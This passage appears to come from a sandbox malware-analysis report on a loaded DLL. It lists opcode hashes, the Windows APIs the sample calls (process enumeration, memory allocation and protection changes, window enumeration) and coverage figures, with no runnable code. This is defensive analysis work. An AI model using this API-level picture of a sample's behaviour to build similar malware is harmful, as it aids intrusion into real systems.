    • Opcode ID: 0055807da5042bb647736de19bf315c7cc7080262b94f7f0173f30ff330bb7ad
    • Instruction ID: b054589480694306ed07ebfcb3a54d079748cc68523788b519db9fcbf24356dc
    • Opcode Fuzzy Hash: 0055807da5042bb647736de19bf315c7cc7080262b94f7f0173f30ff330bb7ad
    • Instruction Fuzzy Hash: A04106756003055BF314DB689C45E2B77D8EFC12E0F144A2DFA55C3285EE76ED0A83A2
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetModuleHandleA.KERNEL32(?), ref: 1000B3A2
    • LoadLibraryA.KERNEL32(?), ref: 1000B3AF
    • wsprintfA.USER32 ref: 1000B3C6
    • MessageBoxA.USER32(00000000,?,1006A09C,00000010), ref: 1000B3DC
      • Part of subcall function 10009390: ExitProcess.KERNEL32 ref: 100093A5
    • atoi.MSVCRT ref: 1000B41B
    • strchr.MSVCRT ref: 1000B453
    • GetProcAddress.KERNEL32(00000000,00000040), ref: 1000B471
    • wsprintfA.USER32 ref: 1000B489
    • MessageBoxA.USER32(00000000,?,1006A09C,00000010), ref: 1000B49F
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: Messagewsprintf$AddressExitHandleLibraryLoadModuleProcProcessatoistrchr
    • String ID:
    • API String ID: 3187504500-0
    • Opcode ID: eaf7c88fcb441d378e7e4088570b6a5866bbed45d5bfb5cc9ea4a237190b3f69
    • Instruction ID: 491f2c0a62f37e4f67161009499e29b69e0f741f7a8c9d6e7004f4b75a98df72
    • Opcode Fuzzy Hash: eaf7c88fcb441d378e7e4088570b6a5866bbed45d5bfb5cc9ea4a237190b3f69
    • Instruction Fuzzy Hash: FC314AB26007555FF320EF24DC84B9B7B98EB85380F004929FB0993246EB75E909CBB5
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CreateFileA.KERNELBASE(80000004,80000000,00000003,00000000,00000003,00000020,00000000,?,10001489,00000001,10069CDF,00000000,80000004,00000001), ref: 100096B5
    • GetFileSize.KERNEL32(00000000,10069CDF,?,00000268,?,10001489,00000001,10069CDF,00000000,80000004,00000001), ref: 100096CC
      • Part of subcall function 10009430: GetProcessHeap.KERNEL32(1000B517,00000008,00000002,00000000,10009825,00000007,00000003,?,?,1000261C,00000003,00000000,00000000,80000005,00000002,00000000), ref: 10009439
      • Part of subcall function 10009430: RtlAllocateHeap.NTDLL(1006A1D4,00000008,80000301), ref: 1000944D
      • Part of subcall function 10009430: MessageBoxA.USER32(00000000,10069FE8,10069FB4,00000010), ref: 10009466
    • ReadFile.KERNELBASE(00000000,00000008,00000000,?,00000000,00000001), ref: 100096F8
    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 100096FF
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: File$Heap$AllocateChangeCloseCreateFindMessageNotificationProcessReadSize
    • String ID:
    • API String ID: 4143106703-0
    • Opcode ID: 9381e33eb8e62eb59d2cf853d973df5be84e3c18288bfb382a4d906760cea2b3
    • Instruction ID: cdbe4ea1d30985889301e2374bea63683511f888104e621f128e3cfb89859431
    • Opcode Fuzzy Hash: 9381e33eb8e62eb59d2cf853d973df5be84e3c18288bfb382a4d906760cea2b3
    • Instruction Fuzzy Hash: 37F04476201310BBF3119F64DCC9FAB77BCEB84B90F104A1EF646961D5E670A5058771
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 1008363F
    • VirtualProtect.KERNELBASE(?,?,7373652D,73736297,?,7373652D,00000000,73736297), ref: 100837AE
    Memory Dump Source
    • Source File: 00000000.00000002.333086536.0000000010080000.00000040.00000800.00020000.00000000.sdmp, Offset: 10080000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10080000_loaddll32.jbxd
    Similarity
    • API ID: Virtual$FreeProtect
    • String ID:
    • API String ID: 2581862158-0
    • Opcode ID: 5116512cfd6bf09bdea013bebf5e822baf0d3f282df84516e26171709676dcb2
    • Instruction ID: cbfd066a6669cc03ceefd0d281f04ad6062c5cf2e557b09b294620d1cb926219
    • Opcode Fuzzy Hash: 5116512cfd6bf09bdea013bebf5e822baf0d3f282df84516e26171709676dcb2
    • Instruction Fuzzy Hash: C5612572E04210AFDB21CA18CC847AAB7A1FFC5350F74C4A6D8899B391E775AD92CB50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 10009748
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: FileModuleName
    • String ID:
    • API String ID: 514040917-0
    • Opcode ID: 40b6032b54c681fbc88b876d943579c68bbc1329a76c471047c3c84e3496b9bc
    • Instruction ID: cb8d5cf13dd1d9b5e2a832ac6758e92f586921095f236dd965c20446dbb83220
    • Opcode Fuzzy Hash: 40b6032b54c681fbc88b876d943579c68bbc1329a76c471047c3c84e3496b9bc
    • Instruction Fuzzy Hash: 3E0149356285100BF308D5389C556AB7BC1EBC03A0F94472DFA6AC31D5DF64DD0AC380
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SetFileAttributesA.KERNELBASE(00000000,00000002,10007744,00000002,00000000,00000000,80000004,00000002,00000000,80000301,00000000,10069CE3,10069CDB,100695C2,00000000), ref: 1000971A
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: AttributesFile
    • String ID:
    • API String ID: 3188754299-0
    • Opcode ID: 2708e965b174b85047c8d0145172c59c26a25c7f0d4e6f625563eef8cc2badcf
    • Instruction ID: ba1b9f9736472015c9caeb0e2b2585a1f4e95ecc7d51d8cd3f73c6f4105449ec
    • Opcode Fuzzy Hash: 2708e965b174b85047c8d0145172c59c26a25c7f0d4e6f625563eef8cc2badcf
    • Instruction Fuzzy Hash: 7EB092B4104201ABDA04DB10C984D2A77A8AB84280F004848B44982110C630D844CA32
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 100835A9
    Memory Dump Source
    • Source File: 00000000.00000002.333086536.0000000010080000.00000040.00000800.00020000.00000000.sdmp, Offset: 10080000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10080000_loaddll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 249bba57007782f45bf0e84b72b43045c2c6b24cb456ac19ab3cd77c178e24dd
    • Instruction ID: 0e55dd4c9f7470d52eab4346b396aa946e407808a0d127f0e42209d590d0d6a2
    • Opcode Fuzzy Hash: 249bba57007782f45bf0e84b72b43045c2c6b24cb456ac19ab3cd77c178e24dd
    • Instruction Fuzzy Hash: 97F04F35D483688BDF61CE248C0C7D9BBB0AB40340F0144D9E9C977295D6B46EC68F54
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 10008096
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100086E3
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: CloseCreateHandleSnapshotToolhelp32
    • String ID:
    • API String ID: 3280610774-0
    • Opcode ID: a3d588b356a1e94a5384f0c322a994dc616931ecb6bd367115764d94705bd62c
    • Instruction ID: 38736623510dd92dfdc6f151b1854b3b81c47a036c1233556d8952d06ecfa9b7
    • Opcode Fuzzy Hash: a3d588b356a1e94a5384f0c322a994dc616931ecb6bd367115764d94705bd62c
    • Instruction Fuzzy Hash: 342218B1E402469BFB40CFA8DCC1B99B7E5FF18394F240474E946AB345E779AA50CB21
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • OpenProcess.KERNEL32(00000410,00000000,100083C0), ref: 100087F6
    • VirtualQueryEx.KERNEL32(00000000,00000000,?,0000001C), ref: 10008AA5
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: OpenProcessQueryVirtual
    • String ID:
    • API String ID: 4117617775-0
    • Opcode ID: 70f9a9ccbcda7bfbacb10c953a6d3799ea928e4c02d333ecc74af9e824fbae17
    • Instruction ID: 8c550e5897e47adf7599d0c38adf365a71993dea935fb9261ba99f324ccd0614
    • Opcode Fuzzy Hash: 70f9a9ccbcda7bfbacb10c953a6d3799ea928e4c02d333ecc74af9e824fbae17
    • Instruction Fuzzy Hash: C1E151B1E40209ABFF40DF94DC82BEDBBB5FB09380F141069F645B6285D7759E108B66
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 100065CF: GetClassNameA.USER32(100062B3,00000000,00000032), ref: 10006626
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 10006333
    • GetCurrentProcessId.KERNEL32 ref: 10006352
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: Process$ClassCurrentNameThreadWindow
    • String ID:
    • API String ID: 1921375019-0
    • Opcode ID: 170ead326dcf4de6e011019e759cec7ab213f3322a509e3b813c2885cdcdba78
    • Instruction ID: 65f13f7fa592221a2cc14f624868cd569e85eb347412389996fc533d2a6223ba
    • Opcode Fuzzy Hash: 170ead326dcf4de6e011019e759cec7ab213f3322a509e3b813c2885cdcdba78
    • Instruction Fuzzy Hash: 629147B5E003469BFB40DFA4DCC2BAE76F9EB183C1F240035E605B6249D675AB44CB62
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,FFFFFFFF,00000000,00000000,00000000,00000000), ref: 10008CEF
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,FFFFFFFF,?,00000000,00000000,00000000), ref: 10008DB3
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: ByteCharMultiWide
    • String ID:
    • API String ID: 626452242-0
    • Opcode ID: 6f183110c026c84c04af3eeea6ac243ff9b50441e84c7bee0904981d56cbbfaf
    • Instruction ID: b2204c503d4b45a11d8d4794e524eac4d7a4f7d29a545cc7e2177c5ab4488784
    • Opcode Fuzzy Hash: 6f183110c026c84c04af3eeea6ac243ff9b50441e84c7bee0904981d56cbbfaf
    • Instruction Fuzzy Hash: D73161B5E40308BBFB00DFE48C42FAE7774EB09790F104165FA14BA2C5E6B26B109B55
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
    • GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnvironmentVariable
    • String ID:
    • API String ID: 1431749950-0
    • Opcode ID: dd9b6342d2937d58137bced8a11c896fce8ab240bf7edca7611241b9c1f55b8c
    • Instruction ID: 6cdedaa81d41af03f281cecd9e0ac06adb9cc61991aa70c549593c09617ecf69
    • Opcode Fuzzy Hash: dd9b6342d2937d58137bced8a11c896fce8ab240bf7edca7611241b9c1f55b8c
    • Instruction Fuzzy Hash: BB21C5B5D14204BFFB40DFE4DC46BAFB7B9EB19281F10407AF505B6245E63297409B61
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • lstrcpyn.KERNEL32(00000001,00000001,00000000,100695BA,100695C2,00000000), ref: 10005FCD
    • RtlMoveMemory.NTDLL(00000000,00000000,00000004), ref: 10006013
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: MemoryMovelstrcpyn
    • String ID:
    • API String ID: 1494768595-0
    • Opcode ID: 5ad4a69017691164163502b9bdba77a4c0536bd206595950376a56159c79dbb4
    • Instruction ID: 1ea9432bcf4f249db5516a5a12c7da5338a9f2cd1788626185d980f8ef2a5bd8
    • Opcode Fuzzy Hash: 5ad4a69017691164163502b9bdba77a4c0536bd206595950376a56159c79dbb4
    • Instruction Fuzzy Hash: 9E2131B4D4020A9BFB00DF95C986BBFBBB8EB093D2F014065E944E7245D636D910CB65
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CloseHandle.KERNEL32(00000000,?,10005668,00000000,00000000), ref: 10005EAC
    • CloseHandle.KERNEL32(00000000,?,10005668,00000000,00000000), ref: 10005ED8
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID:
    • API String ID: 2962429428-0
    • Opcode ID: 7c947d757b40d2b1d0a58a98e59bc80ae9684e0590784dd83700156d9b6bac4d
    • Instruction ID: 36467d162fe4f9701ac00e92914ba883088f779945990f223c5d709893f0a5e0
    • Opcode Fuzzy Hash: 7c947d757b40d2b1d0a58a98e59bc80ae9684e0590784dd83700156d9b6bac4d
    • Instruction Fuzzy Hash: 883130B4A00318EBEF00DF94D9C1B9EBB70FB0E351F1050A5EA486B356C7716A54DBA6
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • RegEnumKeyA.ADVAPI32(00000000,00000000,00000000,00000100), ref: 10007A09
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: Enum
    • String ID:
    • API String ID: 2928410991-0
    • Opcode ID: b884ab7ece2f1b32e4ec299f3d775985568a37b4b490ae73499c4694e5a8569b
    • Instruction ID: 19f3e0f09fb3139a84b485e618a0b4e3a9896e817ec9bcb65a1afd8503e1739f
    • Opcode Fuzzy Hash: b884ab7ece2f1b32e4ec299f3d775985568a37b4b490ae73499c4694e5a8569b
    • Instruction Fuzzy Hash: D72231B5E10345ABFB40DFA4DC82FEE76B9FB18380F104029F609B6246D775AA148B61
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 100021D0
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: MemoryMove
    • String ID:
    • API String ID: 1951056069-0
    • Opcode ID: 6357fa78dd07092ed7b8ec5f174093f8b475fdda17e0ea97ef392f0482d7b954
    • Instruction ID: e8c117cfe2ce38e7afd1dfb50a3cc70b11c57987397a8387b1c431efdec99ce4
    • Opcode Fuzzy Hash: 6357fa78dd07092ed7b8ec5f174093f8b475fdda17e0ea97ef392f0482d7b954
    • Instruction Fuzzy Hash: E5D128B1A402169BFB00DFA8ECC179AB7B5FF59360F290071E845AB305D779B961CB21
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • RtlMoveMemory.NTDLL(00000000,00000000,-00000010), ref: 10002A65
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: MemoryMove
    • String ID:
    • API String ID: 1951056069-0
    • Opcode ID: 372bcd23a16c4afc00cfeed12af7c10c30c128285ea9e092f3487714d21a6a8e
    • Instruction ID: 51266079e0ab4eef95ca9e37e254d61767b009aba728a03217fb4b113baa9e8e
    • Opcode Fuzzy Hash: 372bcd23a16c4afc00cfeed12af7c10c30c128285ea9e092f3487714d21a6a8e
    • Instruction Fuzzy Hash: 4BC13CB1940216CBFB00DF98ECC179EBBB4FF59350F2544A0E485AB308D779A961CB21
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetWindowTextA.USER32(00000000,00000000,00000000), ref: 10006717
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: TextWindow
    • String ID:
    • API String ID: 530164218-0
    • Opcode ID: d12c1f6d40171915a5fc2066c984583a2dde13af0dea6e97dc6d2baf1a56417a
    • Instruction ID: af8ab54a7c013c171f08a0941b8caac9ca2036b1d5b4c92accab96e623d9bf20
    • Opcode Fuzzy Hash: d12c1f6d40171915a5fc2066c984583a2dde13af0dea6e97dc6d2baf1a56417a
    • Instruction Fuzzy Hash: BB2151B5D00209FBFF40DFA0DC86BAEBBB5EB09380F1050A5F504B6145DB765660DB51
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualProtect.KERNEL32(0000FF14,1000680C,00000040,1000680C,1000680C), ref: 100069C5
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: ProtectVirtual
    • String ID:
    • API String ID: 544645111-0
    • Opcode ID: fd8397a20bc2ee09d00d35ddeceaf15d5e0bef245b9d097c416383342cee3638
    • Instruction ID: df1c2df5a7203cfc9315f3c512ba7d90f5e17f6ccad0b77d960eb1cbbc18c7eb
    • Opcode Fuzzy Hash: fd8397a20bc2ee09d00d35ddeceaf15d5e0bef245b9d097c416383342cee3638
    • Instruction Fuzzy Hash: E5212775E00208FBFB40DFA4DC81BAD77B9EB09390F208065FA08BA145D7759B549B56
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetClassNameA.USER32(100062B3,00000000,00000032), ref: 10006626
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: ClassName
    • String ID:
    • API String ID: 1191326365-0
    • Opcode ID: 5f3d0cc3c76e46f5f31987359fa37c2af6f4afc302266c4a070b6cef010a1ded
    • Instruction ID: 88cd5166ace32fdf3bf965dc2fc27c67ee1adcda26424863b8a0ec8378a40cf0
    • Opcode Fuzzy Hash: 5f3d0cc3c76e46f5f31987359fa37c2af6f4afc302266c4a070b6cef010a1ded
    • Instruction Fuzzy Hash: 861152B5E00204BBFB40DAA49C82B5E76EDEB19390F204075F908B7146EA72AB549755
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • EnumWindows.USER32(1000751D,00000000), ref: 10006227
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnumWindows
    • String ID:
    • API String ID: 1129996299-0
    • Opcode ID: 625bdedb4d99f10813f705d1af74ccca0714d5851e99858dc909065e667d64fd
    • Instruction ID: d33495aa917abc3b8b796f041dc489c144632f2343e8c7b2b05d79a98a5b0348
    • Opcode Fuzzy Hash: 625bdedb4d99f10813f705d1af74ccca0714d5851e99858dc909065e667d64fd
    • Instruction Fuzzy Hash: 010179B5D14304F7FB40EFA09D827AE76B9EB0A7C0F101075F10977145DA71A7049762
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualProtect.KERNEL32(1000677F,00000004,00000040,?,?,1000677F), ref: 1000691E
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: ProtectVirtual
    • String ID:
    • API String ID: 544645111-0
    • Opcode ID: 6603756e94fc822b0f178c3ca2cd8c7771027378d4e9126c1b250f0f86f3e113
    • Instruction ID: c0e524da7635b36303f780a4e913d96941c03759a563f0c821b7b937aacd4d45
    • Opcode Fuzzy Hash: 6603756e94fc822b0f178c3ca2cd8c7771027378d4e9126c1b250f0f86f3e113
    • Instruction Fuzzy Hash: 6EF012B4D04208FBEB00DF94D842BADBB79EB15340F108065F6186A184D671AB149B95
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: ProtectVirtual
    • String ID:
    • API String ID: 544645111-0
    • Opcode ID: 098c31e4f898cfe48a8f67f8b3e92f0b956c9a0b306acbd8a685e161ce07b733
    • Instruction ID: faaec284ed0066216158bd651b25f1daaeb72d3a93f6d088fe4fdfa133ec9378
    • Opcode Fuzzy Hash: 098c31e4f898cfe48a8f67f8b3e92f0b956c9a0b306acbd8a685e161ce07b733
    • Instruction Fuzzy Hash: C24161B4E00315ABFB40DFA4DCC1B9D77EEEF08390F204079E909A6246DBB1AA049B11
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4263d83a6fb9b114440df30be9fa905148a7d7abb542143c69aee057420f8470
    • Instruction ID: 5f6ff988ee4a52dbb1b88e021e6d1ef049e7667361733a4f8f93488a0d93900d
    • Opcode Fuzzy Hash: 4263d83a6fb9b114440df30be9fa905148a7d7abb542143c69aee057420f8470
    • Instruction Fuzzy Hash: B0F0A53A6046958FDA65CF08D4D0D85B3F4FB086A8B1548A9DA8AE7B05C360BC44CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 74f784cdb4109649341f86efef469bfaa235da18b29abecc4f88cf6ff71aeb9b
    • Instruction ID: 9089d424d36cda4875cc89eda8c574f5a5f83e2d6b8bb971a0c156854d0e121b
    • Opcode Fuzzy Hash: 74f784cdb4109649341f86efef469bfaa235da18b29abecc4f88cf6ff71aeb9b
    • Instruction Fuzzy Hash: 99D0A970C1920897E640EFA06A0367DB638E703281F0020B6B84C27184EA369A2493EB
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,1006A2E0,00000104), ref: 1000AE7E
    • strrchr.MSVCRT ref: 1000AE8F
    • _ftol.MSVCRT ref: 1000AFCE
    • GetCommandLineA.KERNEL32 ref: 1000AFF4
    • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 1000B061
    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1000B093
    • TranslateMessage.USER32(?), ref: 1000B09A
    • DispatchMessageA.USER32(?), ref: 1000B0A1
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000B0B0
    • wsprintfA.USER32 ref: 1000B2F3
    • MessageBoxA.USER32(00000000,?,1006A018,00000010), ref: 1000B30A
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: Message$Peek$CommandDispatchFileLineModuleNameTranslate_ftolstrrchrwsprintf
    • String ID:
    • API String ID: 3335176381-0
    • Opcode ID: ecb263c5883be14fbdd7951b27c3f5027ec344516bfbf6eaecd4f87e6cf4e675
    • Instruction ID: 550dcc155c2af2a742ea6bd1faa3485fa46c40cd6c1f5de1c3546930abff5cc3
    • Opcode Fuzzy Hash: ecb263c5883be14fbdd7951b27c3f5027ec344516bfbf6eaecd4f87e6cf4e675
    • Instruction Fuzzy Hash: 48C139377849044AF320E668BC41BFFB781E7D13F2F50053BEA05CA1D4D96BA949CA66
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,?,00000000), ref: 1000C4CB
    • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1000C4EA
    • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 1000C501
    • GetTempPathA.KERNEL32(00000104,00000000), ref: 1000C518
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: DirectoryPath$FolderSpecialSystemTempWindows
    • String ID: \$\
    • API String ID: 2721284240-164819647
    • Opcode ID: 9b90a25063b9e1c39bff7ddda37614abe361fa60ecb1f47f8ab911e9c3895cb3
    • Instruction ID: 77cbe7fce8ef9562389d15453b58eba8ebe27cca9de610a2ae966a0e19f657af
    • Opcode Fuzzy Hash: 9b90a25063b9e1c39bff7ddda37614abe361fa60ecb1f47f8ab911e9c3895cb3
    • Instruction Fuzzy Hash: 7F3103B550874A9BF720C728CC95F6E36D0E7417C0F20891AF585C60D9E6B4E88097A2
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 60cd75bbc9cd8ca24744c5fda6e17e72869eac0f45f0e376a98c2c6226a09f87
    • Instruction ID: 997e975f8056afc4703edd2e8b222d0f39c38b45864d1c521b5624a5b2537b3b
    • Opcode Fuzzy Hash: 60cd75bbc9cd8ca24744c5fda6e17e72869eac0f45f0e376a98c2c6226a09f87
    • Instruction Fuzzy Hash: 69514A756046054BF738C6248C42AEF73D5EBC23A0F248B2DFA55C31D8EE7AD9858392
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • malloc.MSVCRT ref: 1000BB13
    • LCMapStringA.KERNEL32(00000804,00400000,?,?,00000000,?,?,?,100695CA,?,00000000,00000000,?,10009E2B,00000001,00000000), ref: 1000BB47
    • ??3@YAXPAX@Z.MSVCRT ref: 1000BB56
    • ??3@YAXPAX@Z.MSVCRT ref: 1000BB74
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: ??3@$Stringmalloc
    • String ID:
    • API String ID: 1006641717-0
    • Opcode ID: 6a2a28c6ebfc604dd3311785f4f21d4eed50436354b036f7b997f2173f3be702
    • Instruction ID: c44458945b11d331972013727580eba0770bfaca40fb43e82456e2fbb398e2da
    • Opcode Fuzzy Hash: 6a2a28c6ebfc604dd3311785f4f21d4eed50436354b036f7b997f2173f3be702
    • Instruction Fuzzy Hash: ED1105762046043BE218DA799C42E6B73CADBC42A1F10462DF226922C5DE72ED054765
    Uniqueness

    Uniqueness Score: -1.00%

    Execution Graph

    Execution Coverage:16.2%
    Dynamic/Decrypted Code Coverage:1.6%
    Signature Coverage:0%
    Total number of Nodes:765
    Total number of Limit Nodes:19
